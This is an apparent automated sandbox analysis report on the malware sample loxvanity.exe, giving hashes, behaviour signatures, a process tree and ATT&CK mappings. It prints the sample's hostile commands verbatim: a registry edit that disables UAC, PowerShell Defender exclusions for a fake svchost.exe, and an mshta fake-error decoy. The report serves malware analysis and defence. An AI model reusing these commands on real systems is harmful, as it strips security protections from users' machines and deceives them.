Analysis
- max time kernel: 35s
- max time network: 55s
- platform: windows10-2004_x64
- resource: win10v2004-20240412-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20240412-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 16-04-2024 01:30
- static task: static1
General
- Target: loxvanity.exe
- Size: 7.5MB
- MD5: ae18d7298dbd5a2f9a1205155f9c03b6
- SHA1: baf3d83ad8a391d36d0a0fdf3a0a510afa4ccc59
- SHA256: 88417151070ccd5906c410061a2d27faf14473607c11eecc58fa56e60f3caf4b
- SHA512: a3988d5d1b8102bc1f074f6c4e1ada4db7bcf673fe81734b82b710c822698f55df5a4a6aaf3734f64cb6282b22eeb9a5eefce390bc1304cbcdff7ec0dbf0e2ef
- SSDEEP: 196608:Rdg6G0KaH2EGMII+QvlRXgh9OADa8k2mv899:1WEfIIDvlCiUCd899
Signatures

Contains code to disable Windows Defender (1 IoC)
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
- YARA match: behavioral1/memory/4940-77-0x000000001BDB0000-0x000000001BDBE000-memory.dmp (rule disable_win_def)

UAC bypass
- reg.exe: Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"

Identifies VirtualBox via ACPI registry values (likely anti-VM) (2 TTPs, 1 IoC)
- svchost.exe: Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__

Checks BIOS information in registry (2 TTPs, 2 IoCs)
BIOS information is often read in order to detect sandboxing environments.
- svchost.exe: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion
- svchost.exe: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion

Checks computer location settings (2 TTPs, 2 IoCs)
Looks up the country code configured in the registry, likely a geofence.
- loxvanity.exe: Key value queried \REGISTRY\USER\S-1-5-21-1826666146-2574340311-1877551059-1000\Control Panel\International\Geo\Nation
- svchost.exe: Key value queried \REGISTRY\USER\S-1-5-21-1826666146-2574340311-1877551059-1000\Control Panel\International\Geo\Nation

Executes dropped EXE (1 IoC)
- PID 4940 svchost.exe

Loads dropped DLL (1 IoC)
- PID 4940 svchost.exe

Obfuscated with Agile.Net obfuscator (2 IoCs)
Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.
- YARA match: C:\ProgramData\svchost.exe (rule agile_net)
- YARA match: behavioral1/memory/4940-18-0x0000000000A20000-0x0000000001126000-memory.dmp (rule agile_net)

YARA matches for rule themida
- C:\Users\Admin\AppData\Local\Temp\989fcd0e-6abf-40ee-9e41-0c366f1c7108\AgileDotNetRT64.dll
- behavioral1/memory/4940-29-0x00007FFE68D30000-0x00007FFE698B4000-memory.dmp
- behavioral1/memory/4940-33-0x00007FFE68D30000-0x00007FFE698B4000-memory.dmp
- behavioral1/memory/4940-50-0x00007FFE68D30000-0x00007FFE698B4000-memory.dmp
- behavioral1/memory/4940-75-0x00007FFE68D30000-0x00007FFE698B4000-memory.dmp
- behavioral1/memory/4940-76-0x00007FFE68D30000-0x00007FFE698B4000-memory.dmp

Checks whether UAC is enabled
- svchost.exe: Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA

Suspicious use of NtSetInformationThreadHideFromDebugger (1 IoC)
- PID 4940 svchost.exe

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).

Suspicious behavior: EnumeratesProcesses (5 IoCs)
- PID 4912 powershell.exe
- PID 4912 powershell.exe
- PID 1352 powershell.exe
- PID 1352 powershell.exe
- PID 4940 svchost.exe

Suspicious use of AdjustPrivilegeToken (4 IoCs)
- Token: SeDebugPrivilege, PID 4940 svchost.exe
- Token: SeDebugPrivilege, PID 4912 powershell.exe
- Token: SeDebugPrivilege, PID 1352 powershell.exe
- Token: SeShutdownPrivilege, PID 4940 svchost.exe

Suspicious use of SetWindowsHookEx (1 IoC)
- PID 4940 svchost.exe

Suspicious use of WriteProcessMemory (34 IoCs, 17 distinct source/target pairs, each recorded twice)
- PID 1816 loxvanity.exe -> PID 4996 cmd.exe
- PID 1816 loxvanity.exe -> PID 4940 svchost.exe
- PID 4996 cmd.exe -> PID 396 chcp.com
- PID 4996 cmd.exe -> PID 1584 cmd.exe
- PID 4996 cmd.exe -> PID 3984 find.exe
- PID 4996 cmd.exe -> PID 1480 findstr.exe
- PID 4996 cmd.exe -> PID 2476 findstr.exe
- PID 4996 cmd.exe -> PID 1688 findstr.exe
- PID 4996 cmd.exe -> PID 1836 findstr.exe
- PID 4996 cmd.exe -> PID 652 find.exe
- PID 4996 cmd.exe -> PID 4056 cmd.exe
- PID 4996 cmd.exe -> PID 1120 cmd.exe
- PID 4996 cmd.exe -> PID 1976 cmd.exe
- PID 1120 cmd.exe -> PID 5032 mshta.exe
- PID 1976 cmd.exe -> PID 2032 reg.exe
- PID 4940 svchost.exe -> PID 4912 powershell.exe
- PID 4940 svchost.exe -> PID 1352 powershell.exe
Processes (bracketed number is the depth in the process tree)
- [1] C:\Users\Admin\AppData\Local\Temp\loxvanity.exe
      command line: "C:\Users\Admin\AppData\Local\Temp\loxvanity.exe"
      signatures: Checks computer location settings; Suspicious use of WriteProcessMemory
  - [2] C:\Windows\system32\cmd.exe
        command line: C:\Windows\system32\cmd.exe /c ""C:\ProgramData\z.bat" "
        signatures: Suspicious use of WriteProcessMemory
    - [3] C:\Windows\system32\chcp.com
          command line: chcp.com 437
    - [3] C:\Windows\system32\cmd.exe
          command line: C:\Windows\system32\cmd.exe /c type tmp
    - [3] C:\Windows\system32\find.exe
          command line: fiNd
    - [3] C:\Windows\system32\findstr.exe
          command line: findstr /L /I set "C:\ProgramData\z.bat"
    - [3] C:\Windows\system32\findstr.exe
          command line: findstr /L /I goto "C:\ProgramData\z.bat"
    - [3] C:\Windows\system32\findstr.exe
          command line: findstr /L /I echo "C:\ProgramData\z.bat"
    - [3] C:\Windows\system32\findstr.exe
          command line: findstr /L /I pause "C:\ProgramData\z.bat"
    - [3] C:\Windows\system32\find.exe
          command line: fINd
    - [3] C:\Windows\system32\cmd.exe
          command line: C:\Windows\system32\cmd.exe /c type tmp
    - [3] C:\Windows\system32\cmd.exe
          command line: cmd.exe /c mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The instruction at 0x00000000771034FB referenced memory at 0x00000000771034FB. The required data was not placed into memory because of an I/O error status of 0x0000428. Click on OK to terminate the program', 0, 'Application Error', 0+16);close()"
          signatures: Suspicious use of WriteProcessMemory
      - [4] C:\Windows\system32\mshta.exe
            command line: mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The instruction at 0x00000000771034FB referenced memory at 0x00000000771034FB. The required data was not placed into memory because of an I/O error status of 0x0000428. Click on OK to terminate the program', 0, 'Application Error', 0+16);close()"
    - [3] C:\Windows\system32\cmd.exe
          command line: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
          signatures: Suspicious use of WriteProcessMemory
      - [4] C:\Windows\system32\reg.exe
            command line: reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
            signatures: UAC bypass
  - [2] C:\ProgramData\svchost.exe
        command line: "C:\ProgramData\svchost.exe"
        signatures: Identifies VirtualBox via ACPI registry values (likely anti-VM); Checks BIOS information in registry; Checks computer location settings; Executes dropped EXE; Loads dropped DLL; Checks whether UAC is enabled; Suspicious use of NtSetInformationThreadHideFromDebugger; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of SetWindowsHookEx; Suspicious use of WriteProcessMemory
    - [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\svchost.exe'
          signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
          signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK Matrix (ATT&CK v13)
- Privilege Escalation
  - Abuse Elevation Control Mechanism (1): Bypass User Account Control (1)
- Defense Evasion
  - Abuse Elevation Control Mechanism (1): Bypass User Account Control (1)
  - Impair Defenses (1): Disable or Modify Tools (1)
  - Modify Registry (1)
  - Virtualization/Sandbox Evasion (1)
Downloads
- C:\ProgramData\svchost.exe (7.0MB)
  MD5: 37937d01536f14247bd0891acbaf3d62
  SHA1: adfdbb97814c4cc30068ba86d5708e1d8dde6471
  SHA256: 4aea68aaf95feee335f0246e51132096409a11043efdc3d57e78f0a8803eb7b8
  SHA512: 803ad02fc353758fae35b1d1c976006328ec5e378697b37dcc7e8cab24613ec9ac0f3c794dce4a790de69ab26215df8ce5b8f963c061d528ffb80ffdcd0f45dd
- C:\ProgramData\tmp (14B)
  MD5: ce585c6ba32ac17652d2345118536f9c
  SHA1: be0e41b3690c42e4c0cdb53d53fc544fb46b758d
  SHA256: 589c942e748ea16dc86923c4391092707ce22315eb01cb85b0988c6762aa0ed3
  SHA512: d397eda475d6853ce5cc28887690ddd5f8891be43767cdb666396580687f901fb6f0cc572afa18bde1468a77e8397812009c954f386c8f69cc0678e1253d5752
- C:\ProgramData\z.bat (21KB)
  MD5: 0902aa3eede3132fdd4d51152b75e07b
  SHA1: b02df12e8acf84e5b156e6ad8ef9ba70c12b8498
  SHA256: debbc8175a46379edba8658e437e58956a2ee54c0f8da5d1b62be82b6b9a6078
  SHA512: 88b2a2383f51f3f72a133acc4b67b47fef5062a1db4717aa3ac90df93e4c2a5c07cc2826320c8ac9bf3cca7f98f16911f8ad4c92c012c43b3a62a5fe31b77e21
- C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log (2KB)
  MD5: d85ba6ff808d9e5444a4b369f5bc2730
  SHA1: 31aa9d96590fff6981b315e0b391b575e4c0804a
  SHA256: 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
  SHA512: 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive (944B)
  MD5: 14c4e65bf8c7c791a39fc3fe3e9b79fa
  SHA1: cb8e103fb6d00fe60272e39605d356d4485c8f46
  SHA256: bc42160231f353408b60e1f64d8f5224b82b895480f4a81fc68fcd23d6d2f8b6
  SHA512: 025a4558a75007291cb6e26bb1f9090f5784bda6ef7dcc7e9013e8cffadae323fd7975f6242adac85981e24bac673ac791dba6d981f180ee18a0c085a38d2ab8
- C:\Users\Admin\AppData\Local\Temp\989fcd0e-6abf-40ee-9e41-0c366f1c7108\AgileDotNetRT64.dll (4.2MB)
  MD5: 05b012457488a95a05d0541e0470d392
  SHA1: 74f541d6a8365508c794ef7b4ac7c297457f9ce3
  SHA256: 1f77a0749ac730500f203b8c4d072587923ac679e184a3859aeb855c2a2e7d8d
  SHA512: 6d6e7b838d4425d49ac8d3738135374ef5357f0677b07cecb7afbf5feddc1997bf6dce68d48787eff8a74c4728def8880c8f01842eda35b5815fb561fa401ae6
- C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3vk5fie4.fbx.ps1 (60B)
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82